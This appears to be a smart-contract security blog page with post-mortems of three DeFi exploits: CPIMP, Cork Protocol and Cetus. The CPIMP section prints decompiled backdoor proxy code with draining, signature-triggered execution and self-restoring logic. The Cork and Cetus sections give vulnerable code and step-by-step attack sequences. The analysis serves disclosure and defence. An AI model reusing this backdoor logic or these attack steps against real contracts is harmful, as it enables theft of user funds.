Category: Tech Deep Dive

Dive into the Dedaub blog for expert insights on smart contract security and blockchain innovation. Explore the latest advancements in the Ethereum ecosystem, including program analysis and DeFi exploits, through concise, expert-driven content designed for developers and blockchain enthusiasts.

  • The CPIMP Attack: an insanely far-reaching vulnerability, successfully mitigated

    [by the Dedaub team]

    A major attack on several prominent DeFi protocols across many blockchains was (largely) successfully mitigated last week. The threat potentially affected (at a minimum) tens of millions of dollars of overall value, and yet the attacker was waiting for even more before making their move!

    The most technically interesting aspects of the threat have to do not with the infection method, but with the attack’s clandestine nature: the attack contracts had been hiding in plain sight for weeks, infiltrating (in custom ways!) multiple protocols, while making sure that they remained entirely transparent both to regular protocol execution and to contract browsing on etherscan.

    We dub the attack vector CPIMP, for “Clandestine Proxy In the Middle of Proxy”, to capture its essence memorably.

    The Contact

    David Benchimol from Venn is no stranger. A few times before, he had brought to our attention potential attack vectors and we had long exchanges on determining feasibility and impact, with the help of our tools.

    On the afternoon of July 8, he put us on high alert, in a hurry!

    David was investigating a red flag raised by his colleague Ruslan Kasheparov. They had found several proxy initializations that had been apparently front-run, to insert malicious implementations.

    Nothing new here, right? Any uninitialized proxy contract can be taken over by the first caller of the initialization function.
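    A minimal Python sketch (a toy model, not EVM semantics) of why this classic takeover works: a typical initializer only guards against running twice, not against who runs it first.

    ```python
    # Toy model of proxy initialization front-running (illustrative only).

    class Proxy:
        def __init__(self):
            self.owner = None
            self.initialized = False

        def initialize(self, caller):
            # The only guard: can't run twice. Nothing checks *who* calls first.
            if self.initialized:
                raise RuntimeError("already initialized")
            self.initialized = True
            self.owner = caller

    proxy = Proxy()
    proxy.initialize("attacker")       # attacker front-runs the deployer's tx
    try:
        proxy.initialize("deployer")   # the legitimate initialization reverts
    except RuntimeError as err:
        print(err)                     # already initialized
    print(proxy.owner)                 # attacker
    ```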

    The difference in the case of the Clandestine Proxy In the Middle of Proxy (CPIMP) is that:

    • the CPIMP keeps track of the original intended implementation
    • the (legitimate owner’s) initialization transaction goes through, without reverting
    • the CPIMP stays in hiding, trying to be entirely transparent to the operation of the protocol: most normal calls propagate to the original implementation and execute correctly
    • at the end of every transaction, the CPIMP restores itself in the implementation slot of the proxy, so it is not removable by any usual or custom upgrade procedure
    • the CPIMP installation is done in such a way that it spoofs events and storage slot contents so that the most popular blockchain explorer, etherscan, reports the legitimate implementation, and not the CPIMP, as the implementation of the proxy.

    (In the future, etherscan will be updated to report the CPIMP correctly — more on that later.)

    So the CPIMP is truly a clandestine proxy in the middle!
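    The behavior described above can be simulated in a few lines of Python (again a toy model, not EVM semantics): the CPIMP forwards every call to the recorded legitimate implementation, then writes itself back into the implementation slot, so even a “successful” upgrade does not dislodge it.

    ```python
    # Toy model of CPIMP transparency and persistence (illustrative only).

    class Proxy:
        """Holds the implementation slot; dispatches every call through it."""
        def __init__(self):
            self.impl_slot = None
        def call(self, data):
            return self.impl_slot.handle(data)

    class LegitImpl:
        def __init__(self, proxy):
            self.proxy = proxy
        def handle(self, call):
            if call.startswith("upgradeTo:"):
                # a "successful" upgrade writes a new implementation...
                self.proxy.impl_slot = call.split(":", 1)[1]
                return "upgraded"
            return f"executed {call}"

    class CPIMP:
        def __init__(self, proxy, legit):
            self.proxy, self.legit = proxy, legit
        def handle(self, call):
            result = self.legit.handle(call)   # stay transparent: forward the call
            self.proxy.impl_slot = self        # ...then restore self in the slot
            return result

    proxy = Proxy()
    legit = LegitImpl(proxy)
    proxy.impl_slot = CPIMP(proxy, legit)      # the infection

    print(proxy.call("transfer"))              # executed transfer (looks normal)
    print(proxy.call("upgradeTo:0xNew"))       # upgrade appears to succeed...
    print(type(proxy.impl_slot).__name__)      # CPIMP -- it restored itself
    ```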

    An example front-running initialization transaction is shown below.

    This is, of course, code controlled by the attacker. But note the two telltale Upgraded events.

    After this point, the victim proxy points to a malicious CPIMP as its implementation. Yet transactions proceed as normal. A careful observer can see the presence of the CPIMP in any transaction explorer:

    Note that dispatching the call required two delegatecall instructions, not just one! Instead of delegating from the proxy straight to the legitimate implementation, the execution delegates first to the CPIMP, which then delegates to the legitimate implementation.

    The attacker is simply lying in wait, maybe holding out for bigger fish before they reveal their presence?

    The Impact

    At the time of contacting us, David already knew that this was not an isolated incident but one affecting tens of contracts. What none of us knew, however, was the extent of the threat.

    Drafting the right query on our DB to determine all affected contracts was not a trivial task. A reasonable first version looked like this:

    (If you run this query, be sure to set the Duration to more than the default “last 24 hrs”.)

    Over the next hours, the query improved a lot, capturing all threatened contracts, over multiple networks, with very few false positives. But even early on, a clear picture emerged: there were many protocols at risk, and fully triaging the threat would take weeks, if not months!

    The contracts that had been taken over by CPIMPs belonged (on different chains) to projects like EtherFi, Pendle, Bera, Orderly Network, Origin, KIP Protocol, Myx, and several more tokens, protocols, oracles, etc. Not all of these were equally vulnerable. In many cases the threat was low. E.g., Pendle had successfully migrated from the infected contracts three weeks earlier and confirmed that they were not vulnerable (although they lost some small amounts in the process because of anti-recovery mechanisms that the CPIMP employed).

    But with several tens of contracts already infected, and many of them appearing to have significant privileges, we had to act, even before fully determining the extent of the threat.

    The War Room

    SEAL 911 and its fearless leader @pcaversaccio are the absolute best to run any war room, and even more so for a war room over a broad, multi-protocol vulnerability!

    For the next 36 hours, we alternated frantically between triaging the threat over infected contracts and seeking contacts from all affected protocols that we could identify.

    The main problem was that mitigation could not be atomic, and any “fix” for one protocol ran a grave risk of notifying the attacker that they had been discovered. This might cause imminent attacks on other protocols, possibly before we were even aware of the extent of the threat to those protocols. The attacker had months to prepare and estimate what they could steal; we only had hours!

    And triaging such a vulnerability is far from easy. Take the case of the Orderly Network CrossChainManager on BNB Chain. The contract can clearly perform actions (e.g., deposit) that will be accepted cross-chain, via LayerZero. But how serious is the threat? Are there timelocks on the other end? Is there some off-chain alerting that will trigger and can help mitigate an attack? Without inspecting large amounts of code, one could not be sure of the severity of a potential attack.

    With all this in mind, in the hours that followed, security contacts for all affected protocols that we could find were brought into the war room. SEAL’s @pcaversaccio ran the show and coordinated the rescues so that minimal information would be leaked. Every solution needed to be custom: in many cases, protocols had to work around a CPIMP that had to be fooled into approving their rescue transactions. Also, most rescues had to run at approximately the same time, before the attacker could react.

    The end result was not perfect, but it was very successful for such a broad vulnerability. The attack is still ongoing, with the attacker still trying to profit from victim contracts that remain vulnerable. However, the overwhelmingly largest part of the threat has been mitigated.

    David’s tweet is the best starting point for following the reactions and aftermath.

    Individual protocols have since published [their] [own] [disclosures].

    Dissecting the CPIMP: a Backdoor Powerhouse

    The true sophistication of the CPIMP emerges when inspecting its decompiled code, which we’ve analyzed across multiple variants. This reveals a highly engineered contract designed for persistent dominance, flexibility, detection evasion, and targeted asset exfiltration. Below is a simplified, summarized decompilation of an Ethereum variant, highlighting buried mechanisms like signature-triggered executions, granular routing, and shadow storage controls:

    // Manually reverse-engineered decompiled excerpt from malicious proxy (based 
    // on bytecode analysis)
    contract MaliciousProxy {
      address private immutable backdoor =
        0xa72df45a431b12ef4e37493d2bcf3d19af3d24fa;
      address private owner;  // Shadow owners possible via multiple slots
      address private _implementation;
      address private _admin;
      mapping(bytes4 => uint8) private selectorModes;  
        // 0=normal, 1=blocked, 2=permissioned
      mapping(bytes4 => address) private selectorToImpl;
      mapping(bytes4 => mapping(address => address)) private perCallerRouting;
      mapping(bytes4 => mapping(address => bool)) private permissions;
      mapping(bytes4 => bool) private silentFlags;  // Suppress events/logs
      mapping(address => bool) private whitelists;
      uint256 private nonce;  // Anti-replay in signatures
    
      modifier backdoorOrOwner() {
        if (msg.sender != backdoor && msg.sender != owner)
          revert("Unauthorized");
        _;
      }
    
      // ?
     
      function drainAssets(address[] calldata tokens) external backdoorOrOwner {
        // Bulk drain tokens, with special handling of ETH
      }
    
      function signedTakeover(bytes calldata data, uint8 v, bytes32 r, 
                              bytes32 s) external {
        // Off-chain triggered via ecrecover
        bytes32 hash = keccak256(abi.encodePacked(
                          "\x19Ethereum Signed Message:\n", data.length, data));
        address signer = ecrecover(hash, v, r, s);
        require(signer == backdoor, "Invalid sig");
        address(this).delegatecall(data);  // Execute arbitrary payload
      }
    
      function updateRouting(bytes4[] calldata selectors, 
                             address[] calldata impls, 
                             uint8[] calldata modes) external backdoorOrOwner {
        // Granular routing updates
        for (uint i = 0; i < selectors.length; i++) {
          selectorToImpl[selectors[i]] = impls[i];
          selectorModes[selectors[i]] = modes[i];
        }
      }
    
      // Complex routing logic
      function getImplementation(bytes4 selector) private returns (address) {
        if (perCallerRouting[selector][msg.sender] != address(0)) {
          return perCallerRouting[selector][msg.sender];  // per-caller override
        } else if (selectorToImpl[selector] != address(0)) {
          return selectorToImpl[selector];  // per-selector override
        } else {
          return _implementation;  // default: the legitimate implementation
        }
      }
    
      // code to restore CPIMP in implementation slot(s)
      function postDelegateReset() private {
        // Pseudocode: STORAGE[slot] stands for a raw sload/sstore at that slot
        // Slot integrity check/reset (prevents upgrades)
        if (STORAGE[uint256(keccak256("eip1967.proxy.implementation")) - 1] !=
            _implementation) {
          STORAGE[uint256(keccak256("eip1967.proxy.implementation")) - 1] =
            _implementation;
        }
        if (_admin != expectedAdmin) {  // Similarly for admin/beacon slots
          _admin = expectedAdmin;
        }
        // Additional resets for owners, nonces if altered during call
      }
    
      // Fallback delegates to routed implementation
      fallback() external payable {
        address impl = getImplementation(msg.sig);
        (bool success, bytes memory ret) = impl.delegatecall(msg.data);
        require(success);
        postDelegateReset(); 
        assembly { return(add(ret, 0x20), mload(ret)) }
      }
    
      // Additional: Direct storage writes, nonce for replays, etc.
      function updateManyStorageSlots(uint256[] calldata index,
                                      bytes32[] calldata value)
          external backdoorOrOwner {
        // Updates multiple storage slots simultaneously
      }
    }

    Although the reverse-engineering above is incomplete, several important elements are clear. The CPIMP extends far beyond a simple relay, embedding a suite of controls for hijacking, persistence, and evasion:

    • Backdoor Authorization with Shadows: The hardcoded backdoor (0xa72df45a…) as an immutable variable overrides ownership for upgrades, drains, and executions, acting as a super-admin. Multiple “owner” slots (e.g., shadow admins) allow stealthy swaps, while the functionality enables unrestricted calls/delegatecalls.
    • Granular Function-Level Routing and Modes: Selectors map to custom implementations or per-caller targets, supporting partial hijacks (e.g., only divert transfers). Enum modes (normal/blocked/permissioned) add flexibility, with whitelists exempting users—ideal for selective attacks without alerting everyone.
    • Protocol-specific logic: The advanced routing mechanism enabled protocol-specific logic to be overridden, without triggering an upgrade to the malicious proxy. We’ve seen multiple instances of specific logic that was added by the attacker to thwart recovery. CPIMPs were sometimes nested, with one pointing to another.
    • Anti-recovery: some of the sub-proxies that are routed into contain hard-coded checks ensuring that the balance does not dip by more than a specific amount in a single transaction (e.g., >90% transfers revert). To evade detection (a public call on itself would appear in a call trace), the attacker reads the relevant storage slots directly. This prevented large rescues (e.g., of >90% of balances), something that Pendle had to face in their recovery.
    • Restoring the CPIMP if removed: after delegating to the original implementation, the CPIMP restores itself in the implementation slot, to prevent upgrades that remove it.
    • Advanced Anti-Detection: Silent upgrades (which selectively emit an Upgraded event based on some preconditions).
    • Batch ETH and Token Draining: The fallback is payable, allowing ETH to accumulate. There is also bulk-draining support: arrays of tokens (and ETH) can be approved and transferred to the backdoor in one operation.
    • Silent Attacks: Signed executions allow operations to take place on L2s, even if the admin/superadmin is blacklisted! Batch operations and direct storage writes (arbitrary slot sets) facilitate the complex chains of operations needed to attack specific protocols.
    • Persistence and Automation Hooks: Counters/nonces track deployments, so that the attacker does not mess up the proxy.

    The attacker’s investment shines through: This isn’t opportunistic — it’s a framework for automated, resilient campaigns to be triggered when the time comes.

    The Sneakiness

    What is perhaps most striking about the CPIMP attack is the sneakiness. The attacker was waiting for even bigger fish and had customized their different CPIMPs for different victims. The extent of manual effort per CPIMP infection seems substantial.

    Perhaps the most interesting of these measures has been the attacker’s attention to not being detectable by etherscan’s “read/write as proxy” feature. If one visits a victim contract’s page, etherscan does not report the CPIMP as the implementation, but instead lists the legitimate implementation contract.

    This is not too surprising, right? All that the attacker needs is to emit fake events, and the service will be fooled.

    Well … no!

    Etherscan’s implementation detection is more sophisticated than that, and the attacker spent significant effort circumventing it. Specifically, etherscan consults the value of storage slots in the proxy contract in order to determine the implementation. Since there is no single standard for where a proxy stores the address of its implementation, each proxy type has its own slot. The infected proxies are EIP-1967 proxies. However, the attacker inserted the legitimate implementation’s address into a slot used by an older OpenZeppelin proxy standard, fooling etherscan into reporting that slot’s contents as the implementation!
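    A sketch of how an explorer that probes multiple known proxy slots can be misled. The slot constants below are the commonly published values for EIP-1967 and the older ZeppelinOS proxy convention, and the probing order is a hypothetical heuristic, not etherscan’s actual logic; verify both against the specs.

    ```python
    # Illustrative explorer heuristic fooled by a planted legacy slot.

    # bytes32(uint256(keccak256("eip1967.proxy.implementation")) - 1)
    EIP1967_IMPL_SLOT = 0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc
    # keccak256("org.zeppelinos.proxy.implementation") -- older OpenZeppelin slot
    ZOS_IMPL_SLOT = 0x7050c9e0f4ca769c69bd3a8ef740bc37934f8e2c036e5a723fd8ee048ed3f8c3

    def detect_implementation(storage):
        """Hypothetical heuristic: try known slots in some fixed order.
        The probing order is the weak point the attacker exploits."""
        for slot in (ZOS_IMPL_SLOT, EIP1967_IMPL_SLOT):
            impl = storage.get(slot, 0)
            if impl != 0:
                return impl

    # Infected EIP-1967 proxy: the real slot holds the CPIMP, but the attacker
    # also planted the legitimate implementation in the legacy slot.
    storage = {
        EIP1967_IMPL_SLOT: 0xC1B1B1,  # the CPIMP (hypothetical address)
        ZOS_IMPL_SLOT:     0x1E617,   # the legitimate impl (hypothetical address)
    }
    print(hex(detect_implementation(storage)))  # reports the planted legitimate impl
    ```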

    The SEAL 911 war room brought in etherscan security contacts, in addition to the victim protocols. As a result, etherscan has quickly marked all contracts that our investigation identified, and is planning to fix the bug that led to the misleading implementation report.

    Parting Words

    Investigating and mitigating the CPIMP attack vector was a very interesting experience: this was an extensive, highly sophisticated man-in-the-middle-style hijacking that had already infected many well-known protocols on several chains (Ethereum, BNB Chain, Arbitrum, Base, Bera, Scroll, Sonic).

    The adrenaline rush from the investigation was incredible and it’s rewarding that most potential loss has been prevented, via a well-coordinated effort. David put it best, so we’ll close with his message:

  • The $11M Cork Protocol Hack: A Critical Lesson in Uniswap V4 Hook Security

    On 28 May 2025, Cork Protocol suffered an $11M exploit due to multiple security weaknesses, culminating in a critical access control vulnerability in their Uniswap V4 hook implementation. The attacker exploited missing validation in the hook’s callback functions, fooling the protocol into thinking that valuable tokens (Redemption Assets) had been deposited by the attacker, thus crediting the attacker with derivative tokens that could be exchanged back into other valuable tokens. The attacker also exploited a flaw in the risk premium calculation, which compounded the attack. Among other things, this incident highlights the importance of proper access control in Uniswap V4 hooks and the risks of highly flexible open designs, which are very hard to secure.

    Background

    Understanding Cork Protocol

    Cork Protocol is a depeg insurance platform built on Uniswap V4 that allows users to hedge against stablecoin or liquid staking token depegs. The protocol operates with four token types per market:

    • RA (Redemption Asset): The “original” asset (e.g., wstETH)
    • PA (Pegged Asset): The “riskier” pegged asset (e.g., weETH)
    • DS (Depeg Swap): Insurance token that pays out if PA depegs from RA
    • CT (Cover Token): The counter-position that earns yield but loses value if depeg occurs

    Another way to think of the DS is a put option at a fixed strike price denominated in RA, while CT is the corresponding short put.

    Users can mint DS + CT by depositing RA, effectively splitting the redemption asset into two complementary positions. A legitimate transaction demonstrating this in action can be found here.

    Unlike modern options protocols such as Opyn, the DS is fully collateralized with RA, which simplifies trust assumptions.
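    To make the option analogy concrete, here is a small numeric sketch in Python (illustrative only: a strike of 1 RA per PA, expressed in basis points, is assumed here; the exact Cork payout formula is protocol-defined).

    ```python
    # Numeric sketch of the DS-as-put / CT-as-short-put analogy (illustrative).
    # Prices in basis points of RA to keep the arithmetic exact.

    def ds_payoff_bps(pa_price_bps, strike_bps=10_000):
        """DS holder's payoff per unit: pays out when PA depegs below the strike."""
        return max(0, strike_bps - pa_price_bps)

    def ct_value_bps(pa_price_bps, strike_bps=10_000):
        """CT is the counter-position: it absorbs whatever the DS pays out."""
        return strike_bps - ds_payoff_bps(pa_price_bps, strike_bps)

    print(ds_payoff_bps(10_000))  # 0    -- no depeg, insurance expires worthless
    print(ds_payoff_bps(8_500))   # 1500 -- PA depegged 15%, DS pays out
    print(ct_value_bps(8_500))    # 8500 -- CT holder bears the depeg loss
    ```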

    Understanding Uniswap V4

    Uniswap V4 represents a significant architectural shift, moving to a central PoolManager (Singleton pattern) and introducing ‘hooks’ – external contracts that the PoolManager calls at various points in a pool’s lifecycle (e.g., before or after swaps, liquidity changes). This design, as highlighted by security experts like Damien Rusinek, offers immense flexibility and customization but, as the Cork Protocol incident demonstrates, also introduces new, critical security considerations for developers.

    Vulnerability 1: Missing Access Control

    The most critical vulnerability in the CorkHook contract was an oversight directly echoing a common pitfall warned about by many security researchers: Cork’s Uniswap hooks could be called by the attacker’s smart contract directly, mid-transaction. Let’s examine the vulnerable beforeSwap function:

    function beforeSwap(
    	address sender,
    	PoolKey calldata key,
    	IPoolManager.SwapParams calldata params,
    	bytes calldata hookData
    ) external override returns (bytes4, BeforeSwapDelta delta, uint24) {
    	PoolState storage self = pool[toAmmId(Currency.unwrap(key.currency0), Currency.unwrap(key.currency1))];
    	// kinda packed, avoid stack too deep 
    	delta = toBeforeSwapDelta(-int128(params.amountSpecified), int128(_beforeSwap(self, params, hookData, sender)));
    	// TODO: do we really need to specify the fee here?
    	return (this.beforeSwap.selector, delta, 0);
    }

    Critical Issue: This function lacks an onlyPoolManager modifier (allowing only calls from a trusted Uniswap v4 manager), meaning anyone can call it directly with arbitrary parameters. While the contract inherits from BaseHook, which provides access control for unlockCallback, it fails to protect other hook callbacks.

    // BaseHook provides this for unlockCallback: 
    modifier onlyPoolManager() {
    	require(msg.sender == address(poolManager), "Caller not pool manager"); _;
    }

    Vulnerability 2: Risk premium calculation rollover

    The risk premium, which affects the price of derivative (CT) tokens, had an extreme value close to expiry. The exploiter acquired a small amount of DS tokens close to expiry, manipulating the price ratio of CT to RA tokens. On rollover (for a new expiry period), this skewed ratio was used to compute how many CT and RA tokens to deposit into the AMM. With a skewed ratio of CT to RA tokens deposited, the exploiter could convert a tiny amount of 0.0000029 wstETH into 3760.8813 weETH-CT.


    The Attack

    Cork Protocol allowed DS (insurance) tokens from one market to be used as RA (safe asset) tokens in another market. This was likely not an intentional design choice, and the protocol authors probably didn’t think of this possibility. An unintended consequence is that relatively valuable tokens (DS tokens) from a good market can potentially be accessed from another market if there’s a vulnerability.

    This relatively obscure security weakness compounded the exploit perpetrated by this attacker in a very complex, multi-step attack.

    Step 1: Cross-Market Token Confusion

    The attacker created a new market configuration that used the DS token of another market as the RA token of the new market.

    // Legitimate market
    Legit Market: {
    	RA: wstETH,
    	PA: weETH,
    	DS: weETH-DS,
    	CT: weETH-CT
    }
    
    // Attacker's new market 
    New Market: { 
    	RA: weETH-DS, // Using DS token as RA!
    	PA: wstETH,
    	DS: new_ds,
    	CT: new_ct
    }

    Step 2: Malicious Hook Contract

    The attacker deployed their own contract implementing the hook interface and rate provider interface. The custom rate provider appears to be a red herring in this attack – it simply returns a fixed rate.

    The new market utilized a fresh Uniswap v4 pool created as part of the new market. The attacker also created (in a separate transaction) a Uniswap pool with the same tokens as the newly created pool (trading new_ct and weETH-DS) but with the hacker’s contract as the hook!

    Step 3: Direct Hook Manipulation

    This is where the action takes place. Due to the missing access control, the attacker could directly call beforeSwap to fool the protocol:

    The pool id of the maliciously created pool was passed into the beforeSwap callback. The hook data supplied as part of the callback directed the protocol to an execution flow in which RAs are deposited and CT and DS tokens are returned. However, no RAs were actually deposited in this transaction: the carefully crafted hook data payload fooled the Cork protocol into believing that the attacker had deposited roughly 3761 weETH-DS. The attacker thereby illegitimately gained 3761 new_ct and 3761 new_ds tokens.

    Step 4: DS Token Extraction

    Once the attacker had gained the new_ct and new_ds tokens, they used these to redeem weETH-DS tokens.

    Step 5: wstETH Token Extraction

    Note that in a previous step the attacker had also exploited another edge case to cheaply acquire weETH-CT tokens. Since this article was first written, a clearer explanation of the miscalculations involved has been posted by the Cork protocol team; the essence is that the exploiter acquired a small amount of DS tokens close to expiry, manipulating the price ratio of CT to RA tokens for the next expiry period. With this manipulation, the exploiter could convert 0.0000029 wstETH (a very small amount) into 3760.8813 weETH-CT.

    Now, all that remained to be done by the attacker was to redeem these weETH-CT and weETH-DS tokens through the protocol, as intended, to withdraw $11M of wstETH.

    Technical Deep Dive: Hook Manipulation

    The _beforeSwap function contains complex logic for handling swaps, including reserve updates and fee calculations:

    function _beforeSwap(
      PoolState storage self,
      IPoolManager.SwapParams calldata params,
      bytes calldata hookData,
      address sender
    ) internal returns (int256 unspecificiedAmount) {
        // ... swap calculations ...
        // Update reserves without validation
        self.updateReservesAsNative(Currency.unwrap(output), amountOut, true);
        // Settle tokens
        settleNormalized(output, poolManager, address(this), amountOut, true);
        // ... more logic ...
    }

    Without access control, an attacker can:

    • Manipulate reserve ratios before legitimate trades
    • Force the hook to settle tokens with arbitrary amounts
    • Bypass normal swap routing through the PoolManager

    Parsing the arguments used in hookData, the attacker crafted a payload intended to indicate that they had deposited 3761 weETH-DS tokens into the new market.

    Contributing Factors

    1. Decentralized Market Creation

    The protocol allowed anyone to create markets with any token pair. This is a courageous design decision; however, it is clearly hard to pull off correctly.

    function beforeInitialize(address, PoolKey calldata key, uint160) external ... {
        address token0 = Currency.unwrap(key.currency0);
        address token1 = Currency.unwrap(key.currency1);
        
        // Dedaub: No validation on token types!
        // Allows DS tokens to be used as RA tokens
    
    }

    2. Insufficient Token Validation

    The _saveIssuedAndMaturationTime function attempts to validate tokens but fails to ensure proper token types:

    function _saveIssuedAndMaturationTime(PoolState storage self) internal {
        IExpiry token0 = IExpiry(self.token0);
        IExpiry token1 = IExpiry(self.token1);
        // Dedaub: Only checks if tokens have expiry, not their type
        try token0.issuedAt() returns (uint256 issuedAt0) {
            self.startTimestamp = issuedAt0;
            self.endTimestamp = token0.expiry();
            return;
        } catch {}
        // ... similar for token1 ...
    }

    3. No Pool Whitelisting

    The callback allowed pools that had the same tokens but a different hook contract. There was no validation of either the pool id or the hook contract address. A simple whitelist would have prevented this:

    mapping(PoolId => bool) public allowedPools;
    
    modifier onlyAllowedPool(PoolKey calldata key) {
        require(allowedPools[key.toId()], "Pool not allowed");
        _;
    }

    4. Singleton Design

    Tokens from the different markets were co-mingled (the Singleton pattern). Therefore, a vulnerability exploited in the new market could extract tokens pertaining to another market.

    Previous Cork Protocol Audits

    Unfortunately, although the Cork protocol had undergone security reviews by four different audit providers, this incident still happened. The protocol team had clearly invested resources in security, making this exploit all the more tragic for both the team and users.

    However, among the four auditors, three of them didn’t audit the vulnerable hook contracts, and it is uncertain whether the risk premium issue could have been easily found just by looking at the code. It is likely that Cantina/Spearbit had the vulnerable CorkHook contract within their audit scope. A pull request with recommendations shows they did identify some issues and suggested improvements.

    Runtime Verification (another auditor who did not have CorkHook in their scope) presciently noted in their report:

    “An interesting follow-up engagement would be to prove the invariants for the CorkHook functions that are being invoked by different components verified within the scope of this engagement, as well as the functions of other contracts, such as CorkHook, Liquidator and HedgeUnit.”

    This observation now seems particularly prophetic, as it was precisely the CorkHook’s interaction with other components that enabled the exploit.

    Recommendations for Hook Developers

    If you’re building a project that interacts with Uniswap v4 hooks in a meaningful way, get your code audited by experts in the area. Dedaub is a Uniswap-whitelisted audit provider, with plenty of experience securing high-stakes projects. Since Dedaub is whitelisted by Uniswap, the audit can also be paid for via a Uniswap Foundation grant. In the meantime, follow the guidelines below. We also recommend listening to Damien Rusinek’s talk.

    Master Access Control and Permissions

    Strict PoolManager-Only Access: This is non-negotiable. Every external hook function that can modify state or is intended to be called by the PoolManager (e.g., beforeSwap, afterSwap, beforeInitialize) must implement robust access control, typically an onlyPoolManager modifier. This was a primary failing in the Cork exploit. As Damien and Hacken emphasize, allowing direct calls by arbitrary addresses is a direct path to state manipulation and fund loss. Cork didn’t follow this recommendation.

    Correct Hook Address Configuration: Uniswap V4 derives hook permissions (which functions the PoolManager will call) directly from the hook contract’s address.

    Address Mining: Deploy hooks using CREATE2 with a salt that ensures the deployed address correctly encodes all intended permissions (e.g., Hooks.BEFORE_SWAP_FLAG | Hooks.AFTER_SWAP_FLAG). Cork didn’t follow this recommendation.
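    A Python sketch of why address mining is needed: a v4-style PoolManager reads which callbacks to invoke from the low bits of the hook’s address. The flag positions below follow the Uniswap v4 Hooks library as commonly documented (an assumption; check the deployed release), and the address derivation is a stand-in, since real CREATE2 derivation uses keccak256.

    ```python
    # Illustrative CREATE2 salt mining for v4-style hook permission bits.

    BEFORE_SWAP_FLAG = 1 << 7   # assumed flag positions; verify against Hooks.sol
    AFTER_SWAP_FLAG  = 1 << 6

    def has_permission(hook_address: int, flag: int) -> bool:
        # The PoolManager-style check: is this flag bit set in the address?
        return hook_address & flag != 0

    def mine_salt(want_flags: int, derive_address):
        """Toy mining loop: try salts until the derived address encodes exactly
        the wanted flags in its low 14 bits (and no others)."""
        for salt in range(1 << 20):
            addr = derive_address(salt)
            if addr & ((1 << 14) - 1) == want_flags:
                return salt, addr
        raise RuntimeError("no salt found in range")

    # Stand-in address derivation for illustration (real CREATE2 uses keccak256
    # over deployer, salt, and init-code hash).
    fake_derive = lambda salt: (0xABCDEF << 20) | (salt * 2654435761 % (1 << 20))

    salt, addr = mine_salt(BEFORE_SWAP_FLAG | AFTER_SWAP_FLAG, fake_derive)
    assert has_permission(addr, BEFORE_SWAP_FLAG)
    assert has_permission(addr, AFTER_SWAP_FLAG)
    ```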

    Mismatch Avoidance: A mismatch between the functions implemented in your hook and the permissions encoded in its address will lead to functions not being called or PoolManager attempting to call non-existent functions, causing reverts (DoS).

    Future-Proofing Upgrades: If you plan to add new hookable functions in future upgrades (for UUPS-style proxies), ensure the initial deployment address already encodes these future permissions. Alternatively, include placeholder functions for them.

    Inherit from BaseHook: Whenever possible, inherit from Uniswap’s BaseHook contract. It provides foundational security checks (like onlyPoolManager for unlockCallback) and helps ensure correct interface adherence, reducing the risk of configuration errors.

    Rigorous State Management and Pool Interaction

    Restrict Pools. If a hook is designed for a specific pool or set of pools, it must validate the PoolKey in its functions (especially initialization) to prevent unauthorized pools from using it. Consider implementing an allowedPools mapping and a modifier like onlyAllowedPool. Ensure the hook can only be initialized once (e.g., in beforeInitialize) to restrict it to a single pool if that’s the design. Cork didn’t follow this recommendation.

    Isolate State for Reusable Hooks: If a hook is intended to be shared across multiple legitimate pools, its internal state must be meticulously segregated (e.g., using mapping(PoolId => PoolSpecificData)). Failure to do so can lead to one pool’s activity corrupting another’s state, potentially locking funds or creating exploitable conditions.

    Prevent Cross-Market Token Contamination: As seen in the Cork exploit, avoid designs where tokens (especially sensitive ones like derivatives or collateral) from one market can be misinterpreted or misused as different token types in another market. Enforce strict token type validation at market creation and within hook logic.

    Understand sender vs. msg.sender vs. Transaction Originator. In hook functions like beforeSwap(address sender, ...) the sender parameter is typically the PoolOperator or the PoolManager itself, not the end-user (EOA) who initiated the transaction. If your hook logic needs the actual end-user, that address must be securely passed via the hookData parameter by a trusted PoolOperator.

    Understand Delta Accounting. BeforeSwapDelta and BalanceDelta are from the hook’s perspective. If the hook takes a fee, it must be a negative delta. If it grants a rebate, it’s a positive delta. Ensure the correct order of token deltas (e.g., specified vs. unspecified, or token0 vs. token1) based on the swap direction (params.zeroForOne). Crucially, all deltas must net to zero by the end of the unlockCallback. The PoolManager tracks this with NonzeroDeltaCount. Unsettled balances will cause the transaction to revert. Hooks modifying balances must ensure they (or the user) settle these amounts correctly (e.g., via settle() or take()).

    Upgradability: If your hook is upgradeable, recognize this as a significant trust assumption. A malicious or compromised owner can change the hook’s logic entirely. Ensure the upgrade mechanism is secure and governed transparently.

    Conclusion

    The Cork Protocol hack demonstrates that Uniswap V4 hooks, while powerful, introduce new security considerations that developers must carefully address. The combination of missing access controls and insufficient token validation created a perfect storm for exploitation. As the DeFi ecosystem continues to evolve with more composable protocols, developers must prioritize security at every layer of their architecture.

  • The Cetus AMM $200M Hack: How a Flawed “Overflow” Check Led to Catastrophic Loss

    The Cetus AMM $200M Hack: How a Flawed “Overflow” Check Led to Catastrophic Loss

    On May 22, 2025, the Cetus AMM on the Sui Network suffered a devastating hack resulting in over $200 million in losses. This incident represents one of the most significant DeFi exploits in recent history, caused by a subtle but critical flaw in “overflow” protection. This analysis dissects the technical details of the exploit and examines when this issue was introduced, fixed, and re-introduced.

    Executive Summary

    The attacker exploited a vulnerability that truncates the most significant bits in a liquidity calculation function of Cetus AMM. This calculation is invoked when a user opens an LP position. When opening such a position, the user specifies a “liquidity” parameter (the fraction of the pool they would like to receive in return) and supplies the corresponding amount of tokens. By manipulating the liquidity parameter to an extremely high value, the attacker caused an overflow in the intermediate calculations that went undetected due to a flawed truncation check. This allowed them to add massive liquidity positions with just 1 unit of token input, subsequently draining pools collectively containing hundreds of millions of dollars worth of tokens.

    Note: the technically precise term for the issue is MSB (most significant bits) truncation rather than “overflow”, but let’s call it “overflow” for simplicity.

    The Attack Sequence

    The attack unfolded in a carefully orchestrated sequence. Here’s an example of one such attack transaction (simplified):

    1. Flash Swap Initiation: The attacker borrowed 10 million haSUI through a flash swap with maximum slippage tolerance
    2. Position Creation: Opened a new liquidity position with tick range [300000, 300200] – an extremely narrow range at the upper bounds
    3. Liquidity Addition: Added liquidity with just 1 unit of token A, but received a massive liquidity value of 10,365,647,984,364,446,732,462,244,378,333,008. This action succeeded due to an undetected bitwise truncation.
    4. Liquidity Removal: Immediately removed the liquidity in multiple transactions, draining the pool
    5. Flash Loan Repayment: Repaid the flash swap and kept approximately 5.7 million SUI as profit

    Technical Deep Dive: The “Overflow” Vulnerability

